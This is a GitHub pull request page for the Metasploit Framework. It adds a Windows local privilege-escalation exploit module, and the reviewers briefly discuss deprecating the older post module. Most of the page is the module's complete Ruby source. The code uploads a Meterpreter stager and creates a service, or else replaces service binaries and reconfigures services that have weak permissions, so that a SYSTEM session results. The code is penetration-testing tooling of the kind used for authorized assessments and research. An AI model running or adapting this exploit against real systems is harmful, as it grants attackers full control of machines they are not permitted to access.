Skip to content
This repository

added exploits/windows/local/service_permissions #892

Merged
merged 2 commits into from over 1 year ago

4 participants

Spencer McIntyre James Lee Tod Beardsley sinn3r
Spencer McIntyre
Collaborator

Ported the post/windows/escalate/service_permissions module to the new exploits/windows/local type. Tested on 32-bit XP SP2, 32-bit Server 2003 and 64-bit Server 2003.

Spencer McIntyre
Collaborator

Also not sure if the old one should have a deprecation warning like bypassuac does.

James Lee
Collaborator

I think it probably should. It's not used in as great a volume as bypassuac, but some warning about modules going away is probably a good thing.

@todb-r7, do you have a strong opinion?

Tod Beardsley
Owner

I have a strong opinion that modules that get replaced by different modules should get a deprecation warning, yes. :)

They should mention www.wolframalpha.com/input/?i=90+days+from+today as their expiry date.

sinn3r wchen-r7 merged commit f5302bf into from October 14, 2012
sinn3r wchen-r7 closed this October 14, 2012
Spencer McIntyre zeroSteiner deleted the branch February 06, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
This page is out of date. Refresh to see the latest.
203  modules/exploits/windows/local/service_permissions.rb
... ...
@@ -0,0 +1,203 @@
  1
+##
  2
+# $Id: service_permissions.rb 15394 2012-06-06 05:53:06Z rapid7 $
  3
+##
  4
+
  5
+##
  6
+# This file is part of the Metasploit Framework and may be subject to
  7
+# redistribution and commercial restrictions. Please see the Metasploit
  8
+# web site for more information on licensing and terms of use.
  9
+#   http://metasploit.com/
  10
+##
  11
+
  12
+require 'msf/core'
  13
+require 'msf/core/post/windows/services'
  14
+require 'rex'
  15
+
  16
+class Metasploit3 < Msf::Exploit::Local
  17
+	Rank = GreatRanking
  18
+
  19
+	include Msf::Post::Windows::WindowsServices
  20
+
  21
+	def initialize(info={})
  22
+		super( update_info( info,
  23
+			'Name'          => 'Windows Escalate Service Permissions Local Privilege Escalation',
  24
+			'Description'   => %q{
  25
+				This module attempts to exploit existing administrative privileges to obtain
  26
+				a SYSTEM session. If directly creating a service fails, this module will inspect
  27
+				existing services to look for insecure file or configuration permissions that may
  28
+				be hijacked. It will then attempt to restart the replaced service to run the
  29
+				payload. This will result in a new session when this succeeds. If the module is
  30
+				able to modify the service but does not have permission to start and stop the
  31
+				affected service, the attacker must wait for the system to restart before a
  32
+				session will be created.
  33
+			},
  34
+			'License'       => MSF_LICENSE,
  35
+			'Author'        => [ 'scriptjunkie' ],
  36
+			'Version'       => '$Revision: 15394 $',
  37
+			'Arch'          => [ ARCH_X86 ],
  38
+			'Platform'      => [ 'windows' ],
  39
+			'SessionTypes'  => [ 'meterpreter' ],
  40
+			'DefaultOptions' =>
  41
+				{
  42
+					'EXITFUNC' => 'thread',
  43
+					'WfsDelay' => '5'
  44
+				},
  45
+			'Targets'       =>
  46
+				[
  47
+					[ 'Automatic', { } ],
  48
+				],
  49
+			'DefaultTarget' => 0
  50
+		))
  51
+
  52
+		register_options([
  53
+			OptBool.new("AGGRESSIVE", [ false, "Exploit as many services as possible (dangerous)", false ])
  54
+		])
  55
+
  56
+	end
  57
+
  58
+	def exploit
  59
+		# randomize the filename
  60
+		filename= Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
  61
+
  62
+		# randomize the exe name
  63
+		tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
  64
+
  65
+		raw = payload.encoded
  66
+		
  67
+		exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
  68
+
  69
+		sysdir = session.fs.file.expand_path("%SystemRoot%")
  70
+		tmpdir = session.fs.file.expand_path("%TEMP%")
  71
+
  72
+		print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
  73
+		begin
  74
+			#
  75
+			# Upload the payload to the filesystem
  76
+			#
  77
+			tempexe = tmpdir + "\\" + tempexe_name
  78
+			fd = session.fs.file.new(tempexe, "wb")
  79
+			fd.write(exe)
  80
+			fd.close
  81
+		rescue ::Exception => e
  82
+			print_error("Error uploading file #{filename}: #{e.class} #{e}")
  83
+			return
  84
+		end
  85
+
  86
+		#attempt to make new service
  87
+
  88
+		#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
  89
+
  90
+		print_status("Trying to add a new service...")
  91
+		adv = session.railgun.advapi32
  92
+		manag = adv.OpenSCManagerA(nil,nil,0x10013)
  93
+		if(manag["return"] != 0)
  94
+			# SC_MANAGER_CREATE_SERVICE = 0x0002
  95
+			# SERVICE_START=0x0010  SERVICE_WIN32_OWN_PROCESS= 0X00000010
  96
+			# SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
  97
+			newservice = adv.CreateServiceA(manag["return"],Rex::Text.rand_text_alpha((rand(8)+6)),
  98
+				"",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
  99
+			if(newservice["return"] != 0)
  100
+				print_status("Created service... #{newservice["return"]}")
  101
+				ret = adv.StartServiceA(newservice["return"], 0, nil)
  102
+				print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
  103
+				adv.DeleteService(newservice["return"])
  104
+				adv.CloseServiceHandle(newservice["return"])
  105
+				if datastore['AGGRESSIVE'] != true
  106
+					adv.CloseServiceHandle(manag["return"])
  107
+					return
  108
+				end
  109
+			else
  110
+				print_error("Uhoh. service creation failed, but we should have the permissions. :-(")
  111
+			end
  112
+		else
  113
+			print_status("No privs to create a service...")
  114
+			manag = adv.OpenSCManagerA(nil,nil,1)
  115
+			if(manag["return"] == 0)
  116
+				print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
  117
+			end
  118
+		end
  119
+		print_status("Trying to find weak permissions in existing services..")
  120
+		#Search through list of services to find weak permissions, whether file or config
  121
+		serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
  122
+		#for each service
  123
+		service_list.each do |serv|
  124
+			begin
  125
+				srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
  126
+				if srvtype != "16"
  127
+					continue
  128
+				end
  129
+				moved = false
  130
+				configed = false
  131
+				#default path, but there should be an ImagePath registry key
  132
+				source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
  133
+				#get path to exe; parse out quotes and arguments
  134
+				sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
  135
+				sourcemaybe = session.fs.file.expand_path(sourceorig)
  136
+				if( sourcemaybe[0] == '"' )
  137
+					sourcemaybe = sourcemaybe.split('"')[1]
  138
+				else
  139
+					sourcemaybe = sourcemaybe.split(' ')[0]
  140
+				end
  141
+				begin
  142
+					session.fs.file.stat(sourcemaybe) #check if it really exists
  143
+					source = sourcemaybe
  144
+				rescue
  145
+					print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
  146
+				end
  147
+				#try to exploit weak file permissions
  148
+				if(source != tempexe && session.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
  149
+					session.railgun.kernel32.CopyFileA(tempexe, source, false)
  150
+					print_status("#{serv} has weak file permissions - #{source} moved to #{source+'.bak'} and replaced.")
  151
+					moved = true
  152
+				end
  153
+				#try to exploit weak config permissions
  154
+				#open with SERVICE_CHANGE_CONFIG (0x0002)
  155
+				servhandleret = adv.OpenServiceA(manag["return"],serv,2)
  156
+				if(servhandleret["return"] != 0)
  157
+					#SERVICE_NO_CHANGE is  0xFFFFFFFF
  158
+					if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,
  159
+							0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
  160
+						print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
  161
+						configed = true
  162
+					end
  163
+					adv.CloseServiceHandle(servhandleret["return"])
  164
+
  165
+				end
  166
+				if(moved != true && configed != true)
  167
+					print_status("No exploitable weak permissions found on #{serv}")
  168
+					continue
  169
+				end
  170
+				print_status("Restarting #{serv}")
  171
+				#open with  SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
  172
+				servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
  173
+				if(servhandleret["return"] != 0)
  174
+					#SERVICE_CONTROL_STOP = 0x00000001
  175
+					if(adv.ControlService(servhandleret["return"],1,56))
  176
+						session.railgun.kernel32.Sleep(1000)
  177
+						adv.StartServiceA(servhandleret["return"],0,nil)
  178
+						print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
  179
+						#Cleanup
  180
+						if moved == true
  181
+							session.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
  182
+						end
  183
+						if configed == true
  184
+							servhandleret = adv.OpenServiceA(manag["return"],serv,2)
  185
+							adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,
  186
+									0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
  187
+							adv.CloseServiceHandle(servhandleret["return"])
  188
+						end
  189
+					else
  190
+						print_status("Could not restart #{serv}. Wait for a reboot or force one yourself.")
  191
+					end
  192
+					adv.CloseServiceHandle(servhandleret["return"])
  193
+					if datastore['AGGRESSIVE'] != true
  194
+						return
  195
+					end
  196
+				else
  197
+					print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
  198
+				end
  199
+			rescue
  200
+			end
  201
+		end
  202
+	end
  203
+end
6  modules/post/windows/escalate/service_permissions.rb
@@ -46,6 +46,12 @@ def initialize(info={})
46 46
 	end
47 47
 
48 48
 	def run
  49
+		print_error("*********************************************************")
  50
+		print_error("*                                                       *")
  51
+		print_error("*       Module will be depricated on Jan 10 2013        *")
  52
+		print_error("* Please use exploits/windows/local/service_permissions *")
  53
+		print_error("*                                                       *")
  54
+		print_error("*********************************************************")
49 55
 		print_status("running")
50 56
 
51 57
 		lhost = datastore["LHOST"] || Rex::Socket.source_address
Commit_comment_tip

Tip: You can add notes to lines in a file. Hover to the left of a line to make a note

Something went wrong with that request. Please try again.